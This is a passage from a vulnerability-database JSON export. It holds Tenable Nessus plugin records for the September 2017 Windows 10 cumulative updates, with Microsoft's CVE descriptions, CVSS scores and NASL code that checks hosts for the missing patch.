to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-03T00:00:00", "title": "KB4038781: Windows 10 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8728", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-11-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038781.NASL", "href": "https://www.tenable.com/plugins/nessus/104385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104385);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_bugtraq_id(\n 98953,\n 100718,\n 100720,\n 100721,\n 100727,\n 100728,\n 100729,\n 100736,\n 100737,\n 100738,\n 100739,\n 100740,\n 100742,\n 100743,\n 100744,\n 100747,\n 100749,\n 100752,\n 100755,\n 100756,\n 100759,\n 100762,\n 100764,\n 100765,\n 100766,\n 100767,\n 100768,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100776,\n 100779,\n 100781,\n 100783,\n 100785,\n 100789,\n 100790,\n 100791,\n 100792,\n 100796,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n\n script_name(english:\"KB4038781: Windows 10 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038781/windows-10-update-kb4038781\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c29dee1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038781.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038781');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038781])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.\n (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. \n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The 